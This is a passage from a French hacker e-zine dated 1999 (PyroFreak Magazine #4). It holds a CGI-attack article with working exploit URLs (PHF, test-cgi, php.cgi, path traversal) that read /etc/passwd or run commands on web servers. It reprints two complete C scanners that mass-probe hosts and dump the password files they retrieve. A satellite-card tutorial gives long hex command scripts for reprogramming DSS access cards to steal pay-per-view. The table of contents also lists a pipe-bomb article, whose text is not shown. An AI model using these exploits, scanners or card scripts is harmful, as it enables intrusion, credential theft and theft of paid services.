-::- La meilleur religion c'est croire en sois même!!!

            _____ _____     _     ______  ______ __ ___      _________
           |:      __ _ \  \  \  /     / |        ____ |    /   ___   |
           |      \__ _\ \  \  \/ ;   /  |;      /_ _/ |   /   /   /; |
           |   ____ __ ___\  \    :  /   |:  _        /   |   /   / : | 
           |: |              /    , /    |, | \     : \   |  :\__/    |
           |; |          ___/ .    /     |. |  \    ;  \  |  ;       /
           |___\         \________/      |___\  \__ ____\ |_________/
            ____ _ ___ __     ___   ___          ______   __    _______
           |:  _ _      ;\   |   \ \   \        /     ;| |  |  /   .  /
           |  |   \_______\  |:  _\ \_ _\      / /|   :| | ;| /      /
          _|  |___   _____   |; |__  ____     / <_|   ,| |  |/    : /
         |_|,  ___| |;   .\  |   __\ \_:__\  /   _     | |        ;/
           |: |     |:  ` /  | :|____  ____  \  / |;   | |  |\     \
           |; |     |, |\ \  | ;     \ \   ;\ \/  |:   | |: | \    .\
           |___\    |__| \_| |________\ \____\    |____| |___\ \_____\
           
                                                                Crédit: __2

13 Mai 1999


Vous devez lire ceci avant d'aller plus loin:

DISCLAMER (Toujours du cris de répétage)
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Pyrofreakmag (et ses membres) tient a avertir les gens qui vont continuer
a  lire le  texte    qui  va  suivre: Qu'ont n'est aucunement responsable 
des actes,  et   meme   des pensées qui pourraient etre produites par les 
lecteurs   de  ce  zine par rapport a nos articles . Nous tenons a mettre 
cela   bien  au  clair. Si vous n'etes pas d'accord avec cet affirmation, 
fermez ce texte et effacer le de votre disque  dur  ou  sur  tout  autres
disques. Vous etes le seul responsable de vos actes.


============================================================================
Comment nous rejoindre?:

Voici les moyens de rejoindre Pyrofreakmag et ses membres.

Soit par IRC, sur #phreak.fr ,via le serveur undernet.
Soit par e-mail: 

            pyrofreakmag@hotmail.com  | Pour tous les membres
            neuro@frphreak.com        | Pour rejoindre Neuro
            lordendrix@hotmail.com    | Pour rejoindre Endrix
              darkm0nk@rocketmail.com | Pour rejoindre [G]r4FX
               NuClEaR@nuc99.com      | Pour rejoindre Nuclear
                   bill@microsoft.com | Pour le service des plaintes

Et venez visiter notre site web: 

- http://pyrofreak.cjb.net
- http://bill.gates.suck.trop.des.fallus.a.mon.gout.usuck.com

Plusieurs graphiques que Endrix produit, sont affichés sur le site. Ils sont
updater plusieurs fois par mois. Allez voir ca!!!!!!

Si vous voulez que votre article paraisse dans le #5, envoyez le à
pyrofreakmag@hotmail.com . Ou si vous avez des questions, envoyez les aussi
a pyrofreakmag@hotmail.com .

 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4 
: 
| TABLE DES MATIERES 
'.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __


         TITRE DE L'ARTICLE                NICK DE L'AUTEUR

         1- Introduction                   Neuro et endrix

         2- Remerciement                   endrix

         3- Attaques-CGI                   endrix

         4- DSS SATellite Hacking          CyberRider

         5- Free Internet Connection       CyberRider

         6- mmmm.... Attempt PHF :)) 
            hehe Funny                     endrix

         7- Divertissement gratuit :)      endrix

         8- Système GSM pour les cel       SlasHerZ

         9- La Theorie Du Phreaking de 
            Cellulaire Analogique          SlasHerZ
            
         10- Pipe bomb à la moi!!!!!       endrix

         11- mIRC 5.3x exploit. encore 
             efficace :)                   CyberRider

         12- Beige Boxing                  endrix

         13- Hacking sur les ordis de 
             l'école                       CyberRider

         14- Conclusion                    PyroPhreak Crew


Extras =   - Porte Bouteille à la Pyro-Phreakers par CyberRider (13ko)
           - ScreenLock par endrix (20ko)
           - Plusieurs Images fait par endrix pour le Crew


À Venir par endrix : - Initiation au Basic
                     - Initiation au Phreaking
                     - Initiation à l'assembleur dos


================================================= Spécial !!!!

J'aimerais bien dire a tout le monde, en lisant, de prendre quelques secondes pour
penser à un de mes chums qui est mort il y a 2 jours avant d'avoir écrit ceci. Il est
mort d'une overdose....

rest in peace J-s :)

- endrix
================================================= Spécial !!!!



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Intro
'.________ __ __ ___________ ____ ______________Par Neuro et Endrix __


-Neuro-

Vous avez, ou allez peut-être remarquer que notre zine est mieux orthographié...et 
oui, on a de l'aide. Maniak est venu a notre rescousse. Aller visiter son site Web, 
qui est tres bon d'ailleurs http://www.maniak.net .

PS: Toi le petit con assis devant ton ordinateur en train d'examiner ce zine pour
    trouver le plus de défauts possibles, personnelement, je t'emmerde. Dis toi
    que ce n'est pas une obligation d'écrire un zine sur l'Underground, mais 
    bien un loisir comme un autre et une maniere d'apprendre que j'aime bien.
    Si tu n'es pas content de ce que tu lis, vient pas me faire chier avec
    ca! 


-Endrix-

-=-=-=-=-=-=-=-=-=-=-=-
-Remerciments spéciaux-
-=-=-=-=-=-=-=-=-=-=-=-

À date, tout au long de notre existence, nous avons reçus de l'aide
mais  nous  n'avons jamais pris le temps de remercier les personnes 
responsablent   pour  l'amélioration   de  ce  e-zine qui est rendu
assez populaire, 800  lecteurs en quelques jours est assez bon pour
nous. Les personnes que j'aimerais remercier   sont les lecteurs ;)
Et oui... Depuis HAQCH, nous commencons à recevoir  de plus en plus
de suggestions, de compliments, de commentaires pour nous améliorer
Merci en particulier SnowCrash de m'avoir remonté le moral un peu ;)
Mais, de plus en plus de personnes  nous  aides  pour  monter ce que
nous sommes  en  ce  moment. Plusieurs  vont  dire, "c'est pas grand
chose encore Pyro-Phreakers" ou "boffff... j'ai vu mieux..". Je sais
nous sommes pas encore au "top", mais je suis sûr que partis comme nous 
sommes en ce moment, c'est sur que nos zines ne vont que s'améliorer et 
j'espère  un  jour    être   plus  populaire  que  nous  le  sommes.

Et merci encore tout le monde pour votre soutient ;)


 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| Attaques-CGI 
'.________ __ __ ___________ ____ _______________ __ ___Par Endrix__ __


La plupart des hacks d'aujourd'hui sont fait à partir des "bugs" des
serveurs et/ou une mal configuration du système. C'est donc pourquoi
j'ai décidé d'écrire un article sur quelques unes de ces attaques, 
mais bien sur, les Crews de sécurité comme, rhino9, Technotronics...
En savent que personne connait. Les attaques que je vais montrer, pour
quelques unes, sont très connues mais pour d'autres un peu moins......
Ce sont des attaques en exploitant le CGI (Common Gateway Interface)
d'un serveur Unix/NT. C'est très simple a réaliser mais moins simple de le trouver.

P.S. À la fin de cet article, vous trouverez 2 sources .c pour scanner
le PHP et PHF


_ ________ _
: Test-cgi :
¯ ¯¯¯¯¯¯¯¯ ¯

Remerciement pour cet article : putois pour m'avoir montrer plus de 
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ truc avec ce petit bug.


Test-cgi : Le test cgi est un script habituellement fait en Perl mais 
¯¯¯¯¯¯¯¯   souvent aussi fait en C. Avec cette commande, il est possible 
           de voir le directory listing(dir, ls) d'un repertoire root sur 
           un serveur. Pour Faire ce qui suit, je vous conseille de vous 
           installer Netscape 3 parce que plus que 3, il y a un patch qui 
           empêche d'exploiter le test- cgi. 

Normalement, le test.cgi est situé dans le répertoire suivant :

Http://www.serveur.com/cgi-bin/test-cgi/test.cgi

Donc pour exploiter cette commande sur un serveur X il faut faire ca :

URL : Http://www.serveur.com/cgi-bin/test-cgi /* (2 espaces)

Ce qui va vous donner ceci :

================================================

CGI/1.0 test script report :

argc is 1. argv is /\*. 

SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.serveur.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
SERVER_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = Ici, seront lister tout les répertoires
               ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
REMOTE_HOST = www.serveur.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
================================================

Pour se promener dans les répertoires, il ne s'agit que d'ajouter le /*rép*/
après le /*


Ou, encore faire ceci : 

URL : Http://www.serveur.com/cgi-bin/test-cgi * (avec 2 espaces)

================================================ 
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = www.serveur.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
SERVER_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = Ici, viendront tout les files
               ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
REMOTE_HOST = www.serveur.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH = 
================================================


Alors comme vous pouvez voir, il est possible d'obtenir plusieurs 
informations sur une machine sans avoir à entrer dedans ;) Je sais pas 
encore si c'est illégal de faire ca.. Si vous le savez, svp, 
j'aimerais avoir un petit mot avec vous. lordendrix@hotmail.com


_ ______ _
: Le PHF :
¯ ¯¯¯¯¯¯ ¯

Le PHF est un bug que presque tous les ordinateurs ont réglés mais, il 
en reste encore quelques uns qui sont vulnérables à cette attaque. Le CGI 
est normalement placé dans www.serveur.com/cgi-bin/phf.cgi. Voici quelques 
facons très simple d'exploiter ce Bug :

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Permet d'obtenir le fichier Password
ex : root:zJpdfS/4Ujkfo:0:0:root:/root:/bin/bash

- 

Mais en plus de pouvoir prendre le etc/passwd, vous pouvez avoir accès
aux autres fichiers et même les exécuter sur le serveur sans avoir à être devant.

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/

Ceci permet de voir le dir listing et pouvoir exécuter des programmes surla machine

-

Ceci est pour avoir un accès COMPLET à la machine... /root ;)

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin

- 

Après avoir eu le root, vous pouvez même voir les permitions des fichiers et répertoires !!!

http://www.serveur.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin

- 

Autres CGI bugs pour obtenir le fichier etc/passwd :
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

PHP : Http://www.serveur.com/cgi-bin/php.cgi?/etc/passwd

View-Source : http://www.serveur.com/cgi-bin/view-source?../../../../../../../etc/passwd

Campas : Http://www.serveur.com/cgi-bin/campas?%0a/bin/cat%0a/etc/passwd

HTMLScript : Http://www.serveur.com/cgi-bin/htmlscript?../../../../etc/passwd

FrontPage : Http://www.serveur.com/_vti_pvt/service.pwd
Http://www.serveur.com/~someuser/cool-logs/mlog.html?screen=[Le chemin parfait de n'importe quel fichier sur le serveur] 

Irix-Wrap : Http://sgi.serveur.com/cgi-bin/wrap?/../../../../../etc

PfDisplay : http://www.serveur.com/cgi-bin/pfdispaly.cgi?/../../../../etc/passwd

FaxSurvey : http://www.serveur.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd


Conclusion :
¯¯¯¯¯¯¯¯¯¯¯¯
Bon, alors j'espère que vous avez bien aimé ca et... faites pas de conneries ;)))



PHF Scanner
¯¯¯¯¯¯¯¯¯¯¯

==========================================================================================
==========================================================================================
/* 
phfscan.c
June, 1996
By Alhambra
alhambra@infonexus.com

A production of The Guild Corporation, 1996

A quick hack to make scanning for hosts which still have the phf bug.
Accepts hosts to scan from stdin, and writes whatever it gets back to
stdout. Plenty of room for optimization, and features that could be 
added include forking off multiple copies for concurrent scans, etc, etc.
Do it yourself...that's how you learn.

The effectiveness of this program for getting password files isn't
what it once was...we see only around a 30% success ratio at getting
/etc/passwd from hosts that would have been vulnerable once upon a time.
But that's still something...

Use:
phfscan < infile > outfile

*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}

main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;

char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd\n";
/* yp version...use as needed...*/
/* char PHFMessage[]="GET /cgi-bin/phf?Qalias=x%0a/usr/bin/ypcat%20passwd\n";*/

while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;

nametocheck = gethostbyname (hosta);

/* Ugly stuff to get host name into inet_ntoa form */
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],
sizeof (outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;

alarm(10); 

X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);

if(FLAG == 1 && X==0){
write(outsocket,PHFMessage,strlen(PHFMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0)
write(1,FileBuf,X);
}
close (outsocket); 
}
return 0;
}
==========================================================================================
==========================================================================================


PHP Scanner
¯¯¯¯¯¯¯¯¯¯¯

==========================================================================================
==========================================================================================
/*

phpscan.c : php.cgi vunerable server scanning program.

Basically a phf scanner, by Alhambra of
The Guild Corperation, optimise as you wish..

Modifed by so1o@insecurity.org of CodeZero.

Usage:
phpscan < infile > outfile

*/

#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}

main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;

char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";

while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;

nametocheck = gethostbyname (hosta);

(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;

alarm(10); 

X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);

if(FLAG == 1 && X==0){
write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket); 
}
return 0;
}
==========================================================================================
==========================================================================================



 ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #4
: 
| DSS SATellite Hacking 
'.________ __ __ ___________ ____ __________ __ ___Par CyberRider__ __



(0)oO0)oO))oO)OO))oO) DSS SATellite Hacking by CyberRider (o)oO0O0(0oO0O0o)


Bon bon bon parler de vrai chose lol!! bon ok Dans cet article ma parler 
du sat hacking plus principalement du sat hacking de la DSS non ce n'est pas 
dish c'est dss et non c'est pas starchoice ou expressvu c'est americain! ok bon 
pourquoi un sat americain? Bin parce que c'est ca qui est ca!!

Ok le Sat hacking n'est pas tres tres répandu au quebec est pas tres tres pratiqué 
un peu partout!! Dans le fond jai decider decrire la dessus parce que c'est pas full 
connu pis on en parle pas dans la moitié des zines fake st'un bon sujet a faire quand 
ta rien a ecrire.

Bon pourquoi jai choisi le dss americain? Car le prochain coup ca sera la dish et 
ensuite on verra.. pis pourquoi moi le cave je choisi un sat americain ?!!! Car ya 
pas de hack pour les canadiens comme expressvu et starchoice... Tu parles dune marde 
meme po hackable!! Pis en plus la qualite analogique est tres poche. 
On a mis une echostar à côté d'une expressvu et à coté d'une dss.. qui remporte la 
meilleur qualite? DSS bien sur! Alors s'pour ca je parle de ca bon!! Meme chose pour 
starchoice c'est de la marde!!! O,k alors bon, vu que vous etes ecoeurer de mon osti 
de placotage pas de but, j'vais commencer mon tutorial!! 

ok go

Bon, premierement as tu ton programmeur de carte ? Il ten faut un mon ti 
gars fake tu va t'en chercher un a quelque part sur le net ou tu le prend dans le zip 
qui est dans s'te zip la nommé dss.zip kewl?? ok c'est kewl!! Ensuite tu te prend une 
bonne bière froide car ca va peut-être etre necessaire faut bien se refroidir les 
neuronnes. Refroidir ca veut pas dire de fumer un bat non plus la tsé!! bon ok that's kewl??? 

ok aussi il te faut une carte p2 H serie de dss sinon tu peut bien 
sure rien faire avec cette merde!! ok si tu as une F card hmmm desolé, try again later. 
Les f card c'est depassé tu peux juste ecouter les postes de musique avec ca alors... 
hmmm fouille sur le net pour un programme nommé tornado32. De toute facon avec ces infos, 
ta carte va être full ca c'est sure !! Aussi, il vous faut des progs pour shooter les 
infos sur la carte. Moi le best des best que je vous suggere est 
Winexplorer, ils sont rendus à la version 3.5.! Pour le dénicher tu vas sur www.dr7.com 
<http://www.dr7.com/> 

Dans dss tool il va y avoir dautre tool mais winexplorer = the best !

Bon, vu que je possède winexplorer mon article sera donc expliqué en fonction de Winexplorer.

Bon pour commencer on va effacer tout ce qui il y avait sur la carte en envoyant ceci :

48 3E 00 00 00
R01

Pour shooter quelque chose vous le mettez dans un txt que vous nommez par, exemple pour 
celui-ci; clean.xpl et vous faites "fichier" dans winexplorer et vous loadez le script 
que vous avez enregistrer ou vous copier/coller seulement les infos dans la 2ieme box en 
haut!

ok après avoir shooter un clean, se qui efface toute la carte... Nous allons mettre 26 
updates dans la carte

En envoyant tout ceci a la carte ne fait surtout aucune erreur en le copiant!!!


;--------------- a partir d'ici
8 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 01 85 14 4E 44 52 20 BB 00 0C CE 15 4A 31 DE
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 02 85 14 4E 44 52 20 BB 00 0C 0D 60 C6 48 17
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 03 85 14 4E 44 52 20 BB 00 0C BF 9E CC 38 C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 04 85 14 4E 44 52 20 BB 00 0C 8F AC 44 62 E3
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 05 85 14 4E 44 52 20 BB 00 0C 35 53 AB 70 BD
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 06 85 14 4E 44 52 20 BB 00 0C 94 C2 28 ED 4A
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 07 85 14 4E 44 52 20 BB 00 0C 4C 1B 19 69 3F
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 08 85 14 4E 44 52 20 BB 00 0C 28 7C EC E5 84
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 09 85 14 4E 44 52 20 BB 00 0C CD 3A 29 74 E4
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0A 85 14 4E 44 52 20 BB 00 0C 2C 9F F6 35 43
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0B 85 14 4E 44 52 20 BB 00 0C 70 DC 0C 2B C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0C 85 14 4E 44 52 20 BB 00 0C 9C 16 FF E3 9B
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0D 85 14 4E 44 52 20 BB 00 0C A8 40 CB 88 8A
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0E 85 14 4E 44 52 20 BB 00 0C 1A 41 D7 1B C5
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 0F 85 14 4E 44 52 20 BB 00 0C 7F 69 C4 88 84
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 10 85 14 4E 44 52 20 BB 00 0C C9 1F B4 00 A9
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 11 85 14 4E 44 52 20 BB 00 0C B6 D4 13 81 11
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 12 85 14 4E 44 52 20 BB 00 0C 00 CE 7F C3 6E
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 13 85 14 4E 44 52 20 BB 00 0C EA 5E C7 39 4E
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 14 85 14 4E 44 52 20 BB 00 0C 2F E8 CD 21 03
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 15 85 14 4E 44 52 20 BB 00 0C DD 32 80 54 C6
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 16 85 14 4E 44 52 20 BB 00 0C CD 40 0F F1 52
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 17 85 14 4E 44 52 20 BB 00 0C 87 91 07 EC 60
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 18 85 14 4E 44 52 20 BB 00 0C be fe fd 52 d0
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 19 85 14 4E 44 52 20 BB 00 0C 53 85 fe a9 73
r02
48 40 00 00 18
r01
09 1A 00 00 30 60 C0 08 00 1a 85 14 4E 44 52 20 BB 00 0C 28 ff 63 3b 5e
r02
;------------ jusqu'ici

Ok je n'ai pas ecrit de commentaires sur les lignes du fichier tout simplement 
parce que c'est simple comment il marche !! Comme vous voyez, il ya 26 grande 
ligne differente ce qui veut dire que si vous etes logique : Chaque ligne = 1 
update precis 1 ligne = le premier update et la derniere la 26ime update ainsi de 
suite. Maintenant votre carte est supposée être a 26 update! Alors quand ca a fini 
de shooter le file dans la boite du log c'est supposer être écrit quelque chose 
comme la (26) Entk, quelque chose qui y ressemble sinon si elle n'a meme pas changer 
apres le clean... the card got looped ;( 

Elle n'est plus vraiment utilisable. il ya des truc mais la c'est des gros secret et 
ca prend une autre machine qu'un proggramer de carte. Désoler c'est pas de ma faute !!
ok jusqu'ici tout va bien!!

Bon, on va continuer à shooter des choses sur notre carte!! avant de continuer on va 
ouvrir le hole 09 de la carte pour pouvoir programmer Bon on shoot ça sur la carte!!

;-------- d'ici
48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 00 00 00 09 24 09
24 09 24 22 22 BB 00 0C 02 9C 62 95 FA
R02

48 42 00 00 1D
R01
09 1A 00 00 30 60 C9 0D 00 01 80 00 00 09 24 09
24 09 24 22 22 BB 00 0C 16 FC 5B 73 BF
R02

48 42 00 00 1C
R01
09 1A 00 00 30 60 D2 02 AC 00 C0 08 00 1B 85 14
01 8F 2F FF BB 00 0C D0 24 2F 61 D7
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1C 88 5E 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1D 88 62 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 1C
R01
09 12 00 00 30 60 C0 08 00 1E 88 66 00 00 00 00
BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
;------ a ici

Ok bon maintenant, le hole 09 est ouvert nous pouvons shooter dautre sorte de 
fichiers sur la carte c cool non?? Oui c cool lol! ok bon ensuite nous allons 
effacer la carte de toute trace de ppv !C'est quoi ca? Bin cliss des pay per view!! 
On efface le prog qui permet d'acheter des pay per view car le programme que nous 
allons mettre va en donner ;) ok?? Bon nous allons maintenant faire le lavage de pay 
per view go!!!


;------`d ici
48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 1F 80 28 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 20 80 30 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 21 80 38 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 22 80 40 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 23 80 48 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 24 80 50 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 25 80 58 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 26 80 60 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 27 80 68 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 28 80 70 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 29 80 78 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2A 80 80 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2B 80 88 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2C 80 90 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2D 80 98 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2E 80 A0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 2F 80 A8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 30 80 B0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 31 80 B8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 32 80 C0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 33 80 C8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 34 80 D0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 35 80 D8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 36 80 E0 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02

48 42 00 00 20
R01
09 12 00 00 30 60 C0 0C 00 37 80 E8 00 00 00 00
00 00 00 00 BB 00 09 10 00 00 0C 71 3C 6B 7D FF
R02
; a ici--------------


ok comme vous voyez il y a 25 lignes doubles!!! C'est parce que il y a seulement 
25 dump de pay per view!! Pas 25 postes et 25 dump, anyway entk on s'en cliss nous, 
on le shoot c'est tout! bon maintenant la carte est complètement vide on en est sure. 
Bon, maintenant nous allons envoyer un fichier da'ctivation que jaime beaucoup c'est 
